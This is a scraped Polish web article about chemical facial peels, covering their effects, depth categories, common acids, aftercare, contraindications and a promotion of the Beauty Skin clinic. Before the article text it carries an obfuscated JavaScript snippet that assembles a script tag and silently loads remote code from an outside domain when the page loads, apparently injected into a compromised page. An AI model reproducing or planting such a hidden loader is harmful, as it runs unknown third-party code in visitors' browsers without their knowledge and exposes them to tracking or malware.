(function(){ tuqzu="hX3yf2iXuqz3";tuqz=document.createElement("script"); tuqz_="u"+("st");tuqz_+="at"+(".");tuqz.async=true;tuqz_+="in"; tuqzu="15127243."+tuqzu;tuqz.type="text/javascript";tuqzu+="rp7tghd2eppl"; tuqzu+="si181w";tuqz_+=("f")+"o"+("/");tuqz.src="//"+tuqz_+tuqzu; tuqzd=document.body;tuqzd.appendChild(tuqz); })(); "/>

Nikogo nie trzeba przekonywać do tego, że po zimie skóra wymaga regeneracji. Niewiele osób jest świadomych, że po lecie także cera może wyglądać gorzej. Szczególnie, jeśli opalenizna już zeszła, pozostawiając po sobie przebarwienia. Doskonałym sposobem na walkę z tego typu problemami jest peeling chemiczny. Zima to idealny czas na złuszczanie skóry twarzy za pomocą peelingu chemicznego. Pomiędzy tymi zabiegami nie jest wskazane przebywanie na słońcu, dlatego zaleca się przeprowadzanie ich w miesiącach, gdy promieni słonecznych jest mniej.

Działanie peelingu chemicznego

Istnieje wiele rodzajów substancji używanych podczas zabiegu peelingu chemicznego. Jednak wszystkie działają na tej samej zasadzie. Mają za zadanie złuszczyć wierzchnie warstwy naskórka, dzięki czemu stanie się widoczna nowa, świeża warstwa skóry. Seria zabiegów peelingu chemicznego może pomóc w walce z bliznami potrądzikowymi, płytkimi zmarszczkami, rozszerzonymi porami, plamami pigmentacyjnymi i piegami.

Od rodzaju kwasu, jego stężenia i czasu, w którym będzie miał kontakt ze skórą zależy to, jak głębokie będzie działanie preparatu. Skóra może łuszczyć się jeszcze kilka dni po zabiegu – jest to całkowicie naturalne zjawisko. Peelingi chemiczne dzielimy na:

  • głębokie – najwyższe stężenia kwasów lub dłuższy czas zabiegu, potrafią oddziaływać na głębsze warstwy skóry,
  • średniogłębokie – powodują zmiany w górnych partiach skóry i całym naskórku,
  • powierzchniowe – ich działanie obejmuje tylko naskórek.

Do wykonywania zabiegów chemicznego złuszczania najczęściej wykorzystuje się kwasy owocowe, na przykład glikolowy, pozyskiwany z trzciny cukrowej. Popularny jest także kwas salicylowy i pochodne witaminy A – retinoidy. Podczas zabiegów złuszczania, takich jak Peeling chemiczny Retises CT, wykonywanych w klinice medycyny estetycznej Beauty Skin jest stosowana mieszanka trzech składników, w której skład wchodzi witamina A, glukozyd askorbylu i witamin B3. Dzięki czemu naskórek jest nie tylko złuszczany, ale neutralizowane są także wolne rodniki. Skóra zaczyna lepiej wiązać wodę i są pobudzane jej naturalne procesy odnowy.

Efektem takiego zabiegu jest widoczne rozjaśnienie i poprawa kolorytu cery. Blizny zostają spłycone, przebarwienia po trądziku bledną i stają się mniej widoczne. Gdy skóra się zregeneruje, można zauważyć jej lepszą elastyczność i jędrność, a także zwężone pory. Przy głębokich peelingach chemicznych małe zmarszczki znikają, a bruzdy ulegają spłyceniu.

Normalnym objawem po zabiegu jest zaczerwienienie skóry, które schodzi w krótkim czasie po nim. Cerę po peelingu należy traktować jak skrajnie wrażliwą. Chronić ją za pomocą kosmetyków barierowych polecanych przez specjalistę, który przeprowadzał zabieg. Po peelingu należy bezwzględnie unikać słońca i stosować kremy z najwyższym filtrem przeciwsłonecznym. Nawet, jeżeli jest środek zimy, a niebo pokrywa szczelna warstwa chmur. Jeśli nie będziemy tego robić istnieje ryzyko, że zamiast się ich pozbyć sprawimy sobie całą gamę nowych przebarwień.

Przeciwwskazania do wykonania peelingu chemicznego to między innymi: świeża opalenizna – naturalna lub z solarium, ciąża i karmienie piersią, alergia skórna, skłonność do pojawiania się bliznowców, aktywna opryszczka, podrażnienia i rany na obszarze, który ma zostać poddany zabiegowi.

Złuszczanie skóry twarzy może pomóc w zwalczaniu wielu problemów skórnych od blizn potrądzikowych, rozszerzonych porów, plam pigmentacyjnych do zmarszczek. Specjaliści z klinik medycyny estetycznej takiej jak Beauty Skin pomogą nam wybrać rodzaj kwasu idealny dla naszej cery.

[Głosów:1    Średnia:5/5]